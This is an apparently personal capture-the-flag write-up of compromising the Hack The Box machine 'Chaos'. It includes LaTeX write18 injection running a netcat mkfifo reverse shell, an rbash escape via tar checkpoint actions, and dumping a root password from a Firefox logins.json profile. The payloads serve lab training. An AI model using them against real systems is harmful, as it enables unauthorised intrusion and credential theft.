HTB: Chaos


This machine is Chaos from Hack The Box


root@kali:~# nmap -T4 -sV
Nmap scan report for
Host is up (0.033s latency).
Not shown: 994 closed ports
80/tcp    open  http     Apache httpd 2.4.34 ((Ubuntu))
110/tcp   open  pop3     Dovecot pop3d
143/tcp   open  imap     Dovecot imapd (Ubuntu)
993/tcp   open  ssl/imap Dovecot imapd (Ubuntu)
995/tcp   open  ssl/pop3 Dovecot pop3d
10000/tcp open  http     MiniServ 1.890 (Webmin httpd)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 43.87 seconds

Gaining User

First the port 80 webserver at

Screenshot 1

Then the port 10000 server

Screenshot 2

I tried the https version at

Screenshot 3

I added an exception for the SSL cert

Screenshot 4

No creds for this yet, so I setup dirbuster on the port 80 webserver

Screenshot 5

Screenshot 6

I went to wp and it led to a wordpress site at, the only post was by user "human"

Screenshot 7

So I tried "human" as the password

Screenshot 8

I have some creds now


It says they are for webmail, and there's some webmail services exposed

root@kali:~# nc 110
+OK Dovecot (Ubuntu) ready.
USER ayush
-ERR [AUTH] Plaintext authentication disallowed on non-secure (SSL/TLS) connections.

It wants me to use the SSL one, I don't want to do that via command line so I installed a mail client called "Evolution"

root@kali:~# apt install evolution -y

I added the account to evolution, using the creds found before and imap as the4 connection type, once I had the account setup I clicked receive all

Screenshot 9

So I inspected the email

Screenshot 10

It says "you are the password", so I guessed the password was


And downloaded the attachments, I looked at the encryptor

root@kali:~# cat
def encrypt(key, filename):
    chunksize = 64*1024
    outputFile = "en" + filename
    filesize = str(os.path.getsize(filename)).zfill(16)
    encryptor =, AES.MODE_CBC, IV)
    with open(filename, 'rb') as infile:
        with open(outputFile, 'wb') as outfile:
            while True:
                chunk =
                if len(chunk) == 0:
                elif len(chunk) % 16 != 0:
                    chunk += b' ' * (16 - (len(chunk) % 16))
def getKey(password):
            hasher ='utf-8'))
            return hasher.digest()

Some googling revealed a very similar script on github

So I saved it as and used it

root@kali:~# python
Would you like to (E)ncrypt or (D)ecrypt?:
File to decrypt

A new file showed up called "t"

root@kali:~# cat t

This was base64 which decoded to

Hii Sahay
Please check our new service which create pdf
p.s - As you told me to encrypt important msg, i did :)

At this point I needed to setup hosts so chaos.htb would work

root@kali:~# echo " chaos.htb" >> /etc/hosts

And went to http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3

Screenshot 11

I fired up burp to watch what was going on , and put "test" and "test1"

Screenshot 12

Then told it to intercept the response

Screenshot 13

Test1 had fatal errored, so I tried test2 which did not. It was generating latex so I decided to try and inject some, starting by setting content to


But got back

BLACKLISTED commands used

So I tried a reverse shell

root@kali:~# nc -nlvp 4444

I was able to get a connection back by injecting

\immediate\write18{nc 4444}
connect to [] from (UNKNOWN) [] 36068

But no reverse shell fired, eventually I managed to get it to work using

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f

But making sure the & was URL encoded to prevent it being treated as a parameter seperator

\immediate\write18{ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>%261|nc 4444 >/tmp/f }

This led to

connect to [] from (UNKNOWN) [] 36104
/bin/sh: 0: can't access tty; job control turned off

I now had a shell

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Which I upgraded

$ python -c "import pty;pty.spawn('/bin/bash')"

Time to look for users

www-data@chaos:/var/www/main/J00_w1ll_f1Nd_n07H1n9_H3r3/compile$ cat /etc/passwd
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:998:998:systemd Core Dumper:/:/sbin/nologin
mysql:x:110:115:MySQL Server,,,:/nonexistent:/bin/false
dovecot:x:112:118:Dovecot mail server,,,:/usr/lib/dovecot:/usr/sbin/nologin
dovenull:x:113:119:Dovecot login user,,,:/nonexistent:/usr/sbin/nologin

I already have a password for ayush, but I'll end up in an rbash, lets try it though

www-data@chaos:/var/www/main/J00_w1ll_f1Nd_n07H1n9_H3r3/compile$ su ayush

The password was


Which led to


But I was now in rbash, I could break out using tar though

ayush@chaos:~$ tar cf /dev/null escape --checkpoint=1 --checkpoint-action=exec=/bin/bash
tar: escape: Cannot stat: No such file or directory
bash: groups: command not found
ayush@chaos:/tmp$ ls -la
ls -la
Command 'ls' is available in '/bin/ls'
The command could not be located because '/bin' is not included in the PATH environment variable.
ls: command not found

I was out but PATH was broken, so I added some sections to it

ayush@chaos:/tmp$ export PATH=/bin:/usr/bin:$PATH
ayush@chaos:/tmp$ cd ~
ayush@chaos:~$ ls -la
drwx------ 6 ayush ayush 4096 Feb  9 02:02 .
drwxr-xr-x 4 root  root  4096 Oct 28 11:34 ..
drwxr-xr-x 2 root  root  4096 Oct 28 12:25 .app
-rw------- 1 root  root     0 Nov 24 23:57 .bash_history
-rw-r--r-- 1 ayush ayush  220 Oct 28 11:34 .bash_logout
-rwxr-xr-x 1 root  root    22 Oct 28 12:27 .bashrc
drwx------ 3 ayush ayush 4096 Feb  9 02:02 .gnupg
drwx------ 3 ayush ayush 4096 Feb  9 17:23 mail
drwx------ 4 ayush ayush 4096 Sep 29 12:09 .mozilla
-rw-r--r-- 1 ayush ayush  807 Oct 28 11:34 .profile
-rw------- 1 ayush ayush   33 Oct 28 12:54 user.txt

There's the user flag

ayush@chaos:~$ cat user.txt

Now For Root

Now for root, the .mozzila directory was unusual

ayush@chaos:~$ cd .mozilla
ayush@chaos:~/.mozilla$ ls -la
drwx------ 4 ayush ayush 4096 Sep 29 12:09 .
drwx------ 6 ayush ayush 4096 Feb  9 02:02 ..
drwx------ 2 ayush ayush 4096 Sep 29 12:09 extensions
drwx------ 4 ayush ayush 4096 Sep 29 12:09 firefox
ayush@chaos:~/.mozilla$ cd firefox
ayush@chaos:~/.mozilla/firefox$ ls -la
drwx------  4 ayush ayush 4096 Sep 29 12:09  .
drwx------  4 ayush ayush 4096 Sep 29 12:09  ..
drwx------ 10 ayush ayush 4096 Oct 27 13:59  bzo7sjt1.default
drwx------  4 ayush ayush 4096 Oct 15 03:59 'Crash Reports'
-rw-r--r--  1 ayush ayush  104 Sep 29 12:09  profiles.ini
ayush@chaos:~/.mozilla/firefox$ cd bzo7sjt1.default
ayush@chaos:~/.mozilla/firefox/bzo7sjt1.default$ ls -la
-rw-------  1 ayush ayush      570 Oct 27 12:10 logins.json

I took a look

ayush@chaos:~/.mozilla/firefox/bzo7sjt1.default$ cat logins.json

I wanted to pull creds out of this profile, and found a python script for it

And loaded it onto the system

root@kali:~# nc -nlvp 2222 <
ayush@chaos:~/.mozilla/firefox/bzo7sjt1.default$ cd /tmp
ayush@chaos:/tmp$ nc 2222 >

Then ran it

ayush@chaos:/tmp$ python ~/.mozilla/firefox
Master Password for profile /home/ayush/.mozilla/firefox/bzo7sjt1.default:

I tried jiujitsu

Website:   https://chaos.htb:10000
Username: 'root'
Password: 'Thiv8wrej~'

And tried to use it to priv esc

ayush@chaos:/tmp$ su

And that was root

root@chaos:/tmp# cd /root
root@chaos:~# ls -la
drwx------  6 root root  4096 Dec  9 17:23 .
drwxr-xr-x 22 root root  4096 Dec  9 17:19 ..
-rw-------  1 root root   245 Dec  9 17:24 .bash_history
-rw-r--r--  1 root root  3106 Aug  6  2018 .bashrc
drwx------  2 root root  4096 Nov 22 21:58 .cache
drwx------  3 root root  4096 Oct 28 13:01 .gnupg
drwxr-xr-x  3 root root  4096 Oct 28 10:39 .local
-rw-------  1 root root  1147 Nov 25 00:38 .mysql_history
-rw-r--r--  1 root root   148 Aug  6  2018 .profile
-rw-------  1 root root    33 Oct 28 12:58 root.txt
drwx------  2 root root  4096 Oct 28 09:25 .ssh
-rw-------  1 root root 12630 Dec  9 17:23 .viminfo
-rw-r--r--  1 root root   165 Oct 28 11:12 .wget-hsts

Now the flag

root@chaos:~# cat root.txt

Leave a Reply

Your email address will not be published. Required fields are marked *